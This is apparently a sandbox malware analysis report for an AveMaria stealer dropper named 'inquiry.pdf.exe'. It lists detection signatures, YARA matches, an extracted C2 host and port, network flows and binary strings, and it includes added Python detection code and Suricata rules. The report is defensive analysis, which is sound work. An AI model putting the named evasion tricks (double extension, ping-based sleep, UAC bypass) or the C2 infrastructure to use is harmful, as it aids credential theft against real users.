Windows Analysis Report
inquiry.pdf.exe

Overview

General Information

Sample Name: inquiry.pdf.exe
Analysis ID: 715157
MD5: 6236e43da1b2c6279760e6b2b7e2d40f
SHA1: a24221417ff9c0d169bf17b7f242824fe61d3b72
SHA256: b4056e17199edd889d2b77c02865136c47ab29566717c2f86ae8911c02e2994a
Tags: exe

Detection

AveMaria, DarkTortilla, UACMe
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected DarkTortilla Crypter
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Increases the number of concurrent connections per server for Internet Explorer
Contains functionality to hide user accounts
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Injects a PE file into a foreign process
Uses ping.exe to sleep
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
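Two of the signatures above can be checked straight from process-creation telemetry: "Uses ping.exe to sleep" (the report's Networking section records cmd.exe spawning `ping 127.0.0.1 -n 7`) and the double-extension file name `inquiry.pdf.exe`. The Python below is an added example and is not part of the Joe Sandbox report or its signature engine; it runs both checks over constructed Sysmon-style process events. The decoy and executable extension lists, the list of ping switches that take a value, and the delay estimate (count minus one second for a loopback ping) are this example's assumptions.

```python
"""Behavioural checks for two of the signatures listed above: 'Uses ping.exe to
sleep' and 'Uses an obfuscated file name to hide its real file extension'.
Added example; not part of the Joe Sandbox report or its signature engine."""
from __future__ import annotations

import shlex
from dataclasses import dataclass

# Assumed lists: extensions used as decoys before the real one, and extensions
# Windows will execute when the file is double-clicked.
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg", "png", "txt", "zip"}
EXEC_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs", "wsf", "msi"}
LOOPBACK = {"127.0.0.1", "::1", "localhost"}
# Windows ping.exe switches that consume the following token (assumed list).
PING_OPTS_WITH_VALUE = {"-n", "-w", "-l", "-i", "-v", "-r", "-s", "-j", "-k", "-c", "-p"}


@dataclass
class ProcessEvent:
    """Constructed process-creation record; field names follow Sysmon event 1."""
    pid: int
    parent_image: str
    image: str
    command_line: str


def double_extension(path: str) -> tuple[str, str] | None:
    """Return (decoy, real) when the file name ends in e.g. '.pdf.exe', else None."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = name.split(".")
    if len(parts) < 3:  # need base name + decoy extension + real extension
        return None
    decoy, real = parts[-2], parts[-1]
    return (decoy, real) if decoy in DECOY_EXTS and real in EXEC_EXTS else None


def ping_sleep(ev: ProcessEvent) -> int | None:
    """Return the approximate delay in seconds when ping.exe is used as a timer.

    A loopback ping answers immediately and ping.exe pauses one second between
    echo requests, so 'ping 127.0.0.1 -n N' burns roughly N-1 seconds and does
    nothing else. Returns None for pings of real hosts or with a count of 1."""
    if not ev.image.lower().endswith("ping.exe"):
        return None
    try:
        argv = shlex.split(ev.command_line, posix=False)
    except ValueError:
        return None
    count, target, i = 1, None, 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith((">", "|", "&")):  # cmd.exe redirection, e.g. '> nul'
            break
        if tok.lower() in PING_OPTS_WITH_VALUE:
            if tok.lower() == "-n" and i + 1 < len(argv) and argv[i + 1].isdigit():
                count = int(argv[i + 1])
            i += 2
            continue
        if not tok.startswith("-"):
            target = tok.lower()
        i += 1
    if target in LOOPBACK and count > 1:
        return count - 1
    return None


def triage(events: list[ProcessEvent]) -> list[str]:
    """Run both checks over a batch of events and return one finding per hit."""
    findings = []
    for ev in events:
        ext = double_extension(ev.image)
        if ext:
            findings.append(f"pid {ev.pid}: double extension .{ext[0]}.{ext[1]} in {ev.image}")
        delay = ping_sleep(ev)
        if delay is not None:
            findings.append(f"pid {ev.pid}: ping-based sleep (~{delay}s) spawned by {ev.parent_image}")
    return findings


# Constructed events; the first two mirror what the report records, the
# other two are benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    ProcessEvent(5896, r"C:\Windows\explorer.exe", r"C:\Users\user\Desktop\inquiry.pdf.exe", "inquiry.pdf.exe"),
    ProcessEvent(6000, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\PING.EXE", "ping 127.0.0.1 -n 7"),
    ProcessEvent(6010, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\System32\PING.EXE", "ping -n 1 8.8.8.8"),
    ProcessEvent(6020, r"C:\Windows\explorer.exe", r"C:\Users\user\Documents\report.pdf", "report.pdf"),
]

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print(line)
```

The ping check deliberately requires a loopback target and a count above one, since a single ping to a real host is a normal connectivity probe; the report's own `ping 127.0.0.1 -n 7` is roughly a six-second delay loop.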

Classification

AV Detection

Source: inquiry.pdf.exe ReversingLabs: Detection: 39%
Source: inquiry.pdf.exe Avira: detected
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: hannoyputa.giize.com Virustotal: Detection: 5%
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Avira: detection malicious, Label: HEUR/AGEN.1251650
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Avira: detection malicious, Label: TR/Agent.able
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Metadefender: Detection: 13%
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe ReversingLabs: Detection: 39%
Source: inquiry.pdf.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Joe Sandbox ML: detected
Source: 19.0.AddInProcess32.exe.900000.0.unpack Avira: Label: TR/Redcap.ghjpt
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack Malware Configuration Extractor: AveMaria {"C2 url": "hannoyputa.giize.com", "port": 3027}
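The Malware Configuration Extractor line above yields the AveMaria C2 host and port, and the report's Networking section records an outbound TCP flow to 23.105.131.206:3027. The Python below is an added example, not part of the report or of Joe Sandbox: it parses that config line and flow records written in the report's own "A:p -> B:q" notation, treats a flow as C2 only when both the configured port and a destination that resolved from the C2 host agree, and emits Suricata rules for the port and for the DNS lookup. The hostname-to-IP mapping, the two extra flow lines and the rule sids are constructed for the example; the report shows the IP and the hostname but does not print the DNS answer.

```python
"""Correlate the AveMaria configuration extracted above with flow records and
turn it into detection content. Added example; not part of the Joe Sandbox
report or of any Joe Sandbox tooling."""
from __future__ import annotations

import json
import re
from dataclasses import dataclass

# Verbatim from the report's Malware Configuration Extractor line.
CONFIG_LINE = 'AveMaria {"C2 url": "hannoyputa.giize.com", "port": 3027}'

# Flow records in the report's own "A:p -> B:q" notation. The first is the
# flow the report lists; the other two are constructed for this example.
FLOW_LINES = [
    "Source: global traffic TCP traffic: 192.168.2.3:49706 -> 23.105.131.206:3027",
    "Source: global traffic TCP traffic: 192.168.2.3:49699 -> 142.250.203.100:443",
    "Source: global traffic TCP traffic: 192.168.2.3:49710 -> 203.0.113.7:3027",
]

# Assumed DNS answer seen in the same capture. The report gives the hostname
# (config) and the IP (traffic) but does not print the resolution itself.
DNS_ANSWERS = {"hannoyputa.giize.com": {"23.105.131.206"}}

FLOW_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3}):(\d+) -> (\d{1,3}(?:\.\d{1,3}){3}):(\d+)")


@dataclass(frozen=True)
class Flow:
    src: str
    sport: int
    dst: str
    dport: int


def parse_config(line: str) -> dict:
    """Split 'Family {json}' into the family name and its C2 host/port."""
    family, _, blob = line.partition(" ")
    cfg = json.loads(blob)
    return {"family": family, "host": cfg["C2 url"].lower(), "port": int(cfg["port"])}


def parse_flows(lines) -> list[Flow]:
    """Extract 'src:sport -> dst:dport' tuples from report-style traffic lines."""
    flows = []
    for line in lines:
        m = FLOW_RE.search(line)
        if m:
            flows.append(Flow(m[1], int(m[2]), m[3], int(m[4])))
    return flows


def c2_flows(cfg: dict, flows: list[Flow], dns: dict[str, set[str]]) -> list[Flow]:
    """Flows on the configured port whose destination resolved from the C2 host.

    Port alone is weak evidence (3027 is unassigned and could carry anything)
    and IP alone misses a C2 that moves ports, so both must agree."""
    ips = dns.get(cfg["host"], set())
    return [f for f in flows if f.dport == cfg["port"] and f.dst in ips]


def suricata_rules(cfg: dict, base_sid: int) -> list[str]:
    """Two Suricata rules: outbound TCP to the C2 port, and the DNS lookup of the host.

    base_sid is an assumption; pick one from your local (>= 1000000) range."""
    fam, host, port = cfg["family"], cfg["host"], cfg["port"]
    tcp = (f'alert tcp $HOME_NET any -> $EXTERNAL_NET {port} '
           f'(msg:"{fam} C2 traffic to port {port}"; flow:to_server,established; '
           f'classtype:trojan-activity; sid:{base_sid}; rev:1;)')
    dns = (f'alert dns $HOME_NET any -> any any '
           f'(msg:"{fam} C2 domain lookup {host}"; dns.query; content:"{host}"; nocase; '
           f'classtype:trojan-activity; sid:{base_sid + 1}; rev:1;)')
    return [tcp, dns]


if __name__ == "__main__":
    cfg = parse_config(CONFIG_LINE)
    for f in c2_flows(cfg, parse_flows(FLOW_LINES), DNS_ANSWERS):
        print(f"C2 flow: {f.src}:{f.sport} -> {f.dst}:{f.dport}")
    print("\n".join(suricata_rules(cfg, 9000001)))
```

The constructed 203.0.113.7:3027 flow is there to show why the port match alone is not used: only the flow whose destination also resolved from the configured host is reported as C2.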

Exploits

Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea71c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea71c8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.e95278.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000000.404261855.0000000000A54000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.486255631.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.485919583.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.486150119.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: inquiry.pdf.exe PID: 5896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: glonkjhg.exe PID: 4760, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AddInProcess32.exe PID: 2400, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AddInProcess32.exe PID: 1916, type: MEMORYSTR
Source: inquiry.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 142.250.203.100:443 -> 192.168.2.3:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.100:443 -> 192.168.2.3:49705 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory created: C:\Program Files\Microsoft DN1
Source: inquiry.pdf.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, 00000014.00000002.515139413.0000000003018000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000014.00000002.515139413.0000000003018000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\inquiry.pdf.exe Code function: 4x nop then mov ecx, 6B3AC8CCh 0_2_00E36B00
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 4x nop then mov ecx, 6B4AC8CCh 18_2_01246B00
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 4x nop then add dword ptr [ebp-20h], 01h 18_2_0124F618

Networking

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 7
Source: Malware configuration extractor URLs: hannoyputa.giize.com
Source: Joe Sandbox View ASN Name: LEASEWEB-USA-NYC-11US
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: www.google.com | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: www.google.com | Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 23.105.131.206
Source: global traffic TCP traffic: 192.168.2.3:49706 -> 23.105.131.206:3027
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: inquiry.pdf.exe, 00000000.00000003.256866785.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: glonkjhg.exe, 00000012.00000003.387459276.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387008337.0000000006712000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387841460.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.538918011.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387643648.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387150885.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387266561.0000000006715000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ns.ado/1Imt
Source: glonkjhg.exe, 00000012.00000003.394602968.0000000006715000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387008337.0000000006712000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.392396802.0000000006715000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387841460.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387643648.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387150885.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387266561.0000000006715000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ns.adobe.c/gImt
Source: glonkjhg.exe, 00000012.00000003.387459276.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387008337.0000000006712000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387841460.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.538918011.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387643648.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387150885.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387266561.0000000006715000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ns.adobe.cobjImt
Source: inquiry.pdf.exe, 00000000.00000002.315753270.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.519656247.0000000002B51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.com
Source: inquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comIta
Source: inquiry.pdf.exe, 00000000.00000003.262056108.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comTC
Source: inquiry.pdf.exe, 00000000.00000003.262056108.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262023926.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comers
Source: inquiry.pdf.exe, 00000000.00000003.262056108.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262023926.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comgo
Source: inquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comintTV
Source: inquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comize
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: inquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.commbe
Source: inquiry.pdf.exe, 00000000.00000003.261955611.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261989796.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.como.(
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289506947.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289778859.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269741425.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289172443.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269921483.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.290241764.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267389986.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com.TTF
Source: inquiry.pdf.exe, 00000000.00000003.267389986.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/
Source: inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: inquiry.pdf.exe, 00000000.00000003.267389986.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
